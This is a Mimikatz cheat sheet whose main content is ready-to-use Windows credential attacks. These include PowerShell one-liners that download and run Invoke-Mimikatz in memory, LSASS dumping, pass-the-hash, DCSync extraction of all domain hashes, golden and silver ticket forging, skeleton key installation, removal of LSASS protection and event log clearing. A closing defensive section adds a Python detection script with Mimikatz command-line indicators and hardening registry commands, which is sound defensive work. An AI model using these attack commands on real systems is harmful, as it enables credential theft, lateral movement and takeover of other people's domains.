
# Mimikatz Cheat Sheet

## Overview

Mimikatz is a powerful credential extraction and manipulation tool by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory, and it can carry out attacks such as pass-the-hash, pass-the-ticket and golden ticket creation.

Warning: Mimikatz is a security testing tool that can be used maliciously. Use it only in environments where you have explicit permission to do so.

## Obtaining Mimikatz

### Official Project

- GitHub: https://github.com/gentilkiwi/mimikatz
- Latest release: https://github.com/gentilkiwi/mimikatz/releases

### Precompiled Binaries

- mimikatz.exe - 32-bit executable
- mimikatz_trunk.zip - contains both 32-bit and 64-bit executables

### Compiling from Source

```bash
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
```

## Basic Usage

### Running Mimikatz

```powershell
# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```

### Elevating Privileges

```
privilege::debug
```

### Getting Help

```
help
::
/?
```

`::` on its own lists the available modules; `module::` (for example `sekurlsa::`) lists the commands of that module.

### Exiting Mimikatz

```
exit
```


## Core Modules and Commands

### sekurlsa Module (LSASS Memory Access)

| Command | Description |
| --- | --- |
| `sekurlsa::logonpasswords` | Extract all logon passwords |
| `sekurlsa::tickets` | Extract Kerberos tickets |
| `sekurlsa::ekeys` | Extract Kerberos encryption keys |
| `sekurlsa::dpapi` | Extract DPAPI master keys |
| `sekurlsa::credman` | Extract credentials from Windows Credential Manager |
| `sekurlsa::msv` | Extract MSV authentication information |
| `sekurlsa::tspkg` | Extract TSPKG authentication information |
| `sekurlsa::wdigest` | Extract WDigest authentication information |
| `sekurlsa::kerberos` | Extract Kerberos authentication information |
| `sekurlsa::ssp` | Extract SSP authentication information |
| `sekurlsa::livessp` | Extract LiveSSP authentication information |
| `sekurlsa::cloudap` | Extract CloudAP authentication information |

### lsadump Module (SAM and Active Directory)

| Command | Description |
| --- | --- |
| `lsadump::sam` | Extract hashes from the SAM database |
| `lsadump::secrets` | Extract LSA secrets |
| `lsadump::cache` | Extract cached domain credentials |
| `lsadump::dcsync` | Perform a DCSync attack to retrieve password data |
| `lsadump::lsa` | Dump account hashes via the LSA |
| `lsadump::trust` | Extract domain trust keys |
| `lsadump::backupkeys` | Extract domain backup keys |

### kerberos Module (Ticket Manipulation)

| Command | Description |
| --- | --- |
| `kerberos::list` | List all Kerberos tickets |
| `kerberos::purge` | Purge all Kerberos tickets |
| `kerberos::ptt` | Pass-the-ticket (inject a ticket) |
| `kerberos::golden` | Create a golden ticket |
| `kerberos::silver` | Create a silver ticket |
| `kerberos::tgt` | Retrieve the current TGT |
| `kerberos::hash` | Calculate Kerberos keys from a password |

### crypto Module (Cryptographic Operations)

| Command | Description |
| --- | --- |
| `crypto::certificates` | List certificates |
| `crypto::keys` | List keys |
| `crypto::system` | List system certificates |
| `crypto::capi` | List CAPI certificates |
| `crypto::cng` | List CNG certificates |
| `crypto::stores` | List certificate stores |

### vault Module (Windows Vault Access)

| Command | Description |
| --- | --- |
| `vault::cred` | List credentials in the Windows Vault |
| `vault::list` | List vault credentials |

### token Module (Token Manipulation)

| Command | Description |
| --- | --- |
| `token::whoami` | Display current token information |
| `token::list` | List all tokens |
| `token::elevate` | Elevate token privileges |
| `token::revert` | Revert token |
| `token::run` | Run a process with a token |

### privilege Module (Privilege Management)

| Command | Description |
| --- | --- |
| `privilege::debug` | Enable debug privilege |
| `privilege::driver` | Load a driver |

### event Module (Event Log Management)

| Command | Description |
| --- | --- |
| `event::clear` | Clear event logs |
| `event::drop` | Drop event logs |

### ts Module (Terminal Services)

| Command | Description |
| --- | --- |
| `ts::sessions` | List terminal services sessions |
| `ts::multirdp` | Enable multiple RDP sessions |

### misc Module (Miscellaneous)

| Command | Description |
| --- | --- |
| `misc::cmd` | Command prompt |
| `misc::regedit` | Registry editor |
| `misc::taskmgr` | Task manager |
| `misc::ncroutemon` | Network connection route monitor |
| `misc::detours` | Detours detection |
| `misc::skeleton` | Install skeleton key |

## Common Attack Techniques

### Credential Dumping

#### Extract Logon Passwords

```
privilege::debug
sekurlsa::logonpasswords
```

#### Extract Credentials from the SAM

```
privilege::debug
token::elevate
lsadump::sam
```

#### Extract Cached Domain Credentials

```
privilege::debug
lsadump::cache
```

#### Extract from an LSASS Dump

Create the dump with Task Manager or procdump, then:

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

### Pass-the-Hash Attacks

#### Pass-the-Hash with NTLM

```
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D
```

#### Pass-the-Hash with an AES Key

```
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF
```

#### Over-Pass-the-Hash (Convert NTLM to Kerberos)

```
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe
```

### DCSync Attack

#### Extract NTLM Hashes for All Users

```
lsadump::dcsync /domain:contoso.local /all
```

#### Extract the NTLM Hash for a Specific User

```
lsadump::dcsync /domain:contoso.local /user:Administrator
```

#### NTLM Hash for KRBTGT (for a Golden Ticket)

```
lsadump::dcsync /domain:contoso.local /user:krbtgt
```

### Kerberos Ticket Attacks

#### List Kerberos Tickets

```
kerberos::list
```

#### Create a Golden Ticket

Format: `kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE`

```
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi
```

#### Create a Silver Ticket

Format: `kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE`

```
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi
```

#### Pass-the-Ticket

```
kerberos::ptt golden.kirbi
```

#### Purge Tickets

```
kerberos::purge
```

### Skeleton Key Attack

```
privilege::debug
misc::skeleton
```

## Advanced Techniques

### DPAPI Master Key Extraction

```
sekurlsa::dpapi
```

### LSA Protection Bypass

1. Load the mimikatz driver: `mimidrv::service`
2. Enable debug privilege: `privilege::debug`
3. Load the driver: `!+`
4. Remove LSASS protection: `!processprotect /process:lsass.exe /remove`
5. Extract credentials: `sekurlsa::logonpasswords`

### Remote Extraction

Create a process dump of LSASS using Task Manager or procdump:

```
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

Then analyze the dump file:

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

### Extract Credentials from Windows Credential Manager

```
vault::cred
vault::list
```

### Extract Domain Backup Keys

```
lsadump::backupkeys /system:dc01.contoso.local /export
```

## Command Examples with Parameters

### sekurlsa::logonpasswords

```
sekurlsa::logonpasswords [/patch]
```

### sekurlsa::pth

```
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]
```

### lsadump::dcsync

```
lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
```

### kerberos::golden

```
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]
```

### kerberos::ptt

```
kerberos::ptt TICKET_FILE
```

## Defensive Measures

### Detection Methods
- Monitor for process creation of mimikatz.exe and for suspicious processes accessing lsass.exe
- Monitor for suspicious LSASS memory access
- Monitor for DCSync operations (replication requests from non-DC machines)
- Monitor for ticket creation and manipulation
- Monitor for privilege escalation
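The first three monitoring points above (process creation, LSASS memory access, DCSync) written as a small set of detection rules in Python. This is an added example, not part of the original cheat sheet, and it runs over constructed event records shaped like the EventData of Security events 4662 and 4688 and Sysmon event 10. The replication-right GUIDs and the PROCESS_VM_READ bit are real Windows values; the domain-controller account list, the LSASS reader allow list and the sample events are assumptions made for the example.

```python
"""Detection rules for three Mimikatz indicators, run over constructed
Windows event records (added example, not real telemetry)."""
import ntpath
from dataclasses import dataclass, field

# Control-access-right GUIDs that Security event 4662 reports in its
# "Properties" field when directory replication is requested (AD schema values).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# PROCESS_VM_READ bit of the Sysmon event 10 GrantedAccess mask (Win32 constant);
# reading LSASS memory is what sekurlsa::logonpasswords needs.
PROCESS_VM_READ = 0x0010

# Module syntax from the cheat sheet; on a command line it is a strong indicator
# even when the binary has been renamed.
MIMIKATZ_MODULE_PREFIXES = ("sekurlsa::", "lsadump::", "kerberos::", "misc::skeleton")

# Assumed allow lists for this example; populate them from your own environment.
DOMAIN_CONTROLLER_ACCOUNTS = {"DC01$", "DC02$"}
ALLOWED_LSASS_READERS = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


@dataclass
class Event:
    channel: str                              # "Security" or "Sysmon"
    event_id: int
    data: dict = field(default_factory=dict)  # selected EventData fields


def detect_dcsync(ev):
    """4662 carrying a replication right, requested by something other than a DC."""
    if ev.channel != "Security" or ev.event_id != 4662:
        return None
    # Real events list the GUIDs in a multi-line string; here they are a list.
    requested = {g.strip("{}").lower() for g in ev.data.get("Properties", [])}
    if not requested & REPLICATION_GUIDS:
        return None
    account = ev.data.get("SubjectUserName", "")
    if account.upper() in DOMAIN_CONTROLLER_ACCOUNTS:
        return None
    return f"DCSync: replication rights requested by {account}"


def detect_lsass_access(ev):
    """Sysmon 10: a process outside the allow list opened lsass.exe with VM_READ."""
    if ev.channel != "Sysmon" or ev.event_id != 10:
        return None
    target = ev.data.get("TargetImage", "").lower()
    if ntpath.basename(target) != "lsass.exe":
        return None
    granted = int(ev.data.get("GrantedAccess", "0x0"), 16)  # logged as hex text
    source = ev.data.get("SourceImage", "").lower()
    if granted & PROCESS_VM_READ and source not in ALLOWED_LSASS_READERS:
        return f"LSASS read access 0x{granted:x} from {source}"
    return None


def detect_mimikatz_process(ev):
    """4688: the mimikatz binary name, or its module syntax on the command line."""
    if ev.channel != "Security" or ev.event_id != 4688:
        return None
    image = ntpath.basename(ev.data.get("NewProcessName", "")).lower()
    cmdline = ev.data.get("CommandLine", "").lower()
    if image == "mimikatz.exe" or any(p in cmdline for p in MIMIKATZ_MODULE_PREFIXES):
        return f"Mimikatz process creation: {ev.data.get('CommandLine') or image}"
    return None


RULES = (detect_dcsync, detect_lsass_access, detect_mimikatz_process)


def run_rules(events):
    """Return every alert from every rule, in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events: three benign, three that should alert.
SAMPLE_EVENTS = [
    Event("Security", 4662, {"SubjectUserName": "DC02$",
                             "Properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]}),
    Event("Security", 4662, {"SubjectUserName": "jdoe",
                             "Properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]}),
    Event("Sysmon", 10, {"SourceImage": r"C:\Windows\System32\csrss.exe",
                         "TargetImage": r"C:\Windows\System32\lsass.exe",
                         "GrantedAccess": "0x1010"}),
    Event("Sysmon", 10, {"SourceImage": r"C:\Users\jdoe\Downloads\tool.exe",
                         "TargetImage": r"C:\Windows\System32\lsass.exe",
                         "GrantedAccess": "0x1010"}),
    Event("Security", 4688, {"NewProcessName": r"C:\Windows\System32\notepad.exe",
                             "CommandLine": "notepad.exe"}),
    Event("Security", 4688, {"NewProcessName": r"C:\Temp\svc.exe",
                             "CommandLine": 'svc.exe "privilege::debug" "sekurlsa::logonpasswords" exit'}),
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

The DCSync rule keys on the account rather than the source host because event 4662 does not carry a client address; in a real pipeline, correlate the logon ID with the preceding 4624 to recover the source machine, and keep the DC account list in sync with the domain's actual domain controllers so legitimate replication is not flagged.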

### Prevention Methods
- Enable LSA Protection (RunAsPPL)

```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
```

- Enable Credential Guard (Windows 10/Server 2016+)
- Use the Protected Users group
- Disable WDigest authentication

```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
```

- Implement Just Enough Administration (JEA)
- Rotate passwords regularly
- Restrict administrative rights
- Use strong passwords

## Resources

- [Official GitHub Repository](https://github.com/gentilkiwi/mimikatz)
- Mimikatz Wiki
- ADSecurity Mimikatz Guide
- MITRE ATT&CK - Credential Dumping
- MITRE ATT&CK - Pass the Hash
- MITRE ATT&CK - Pass the Ticket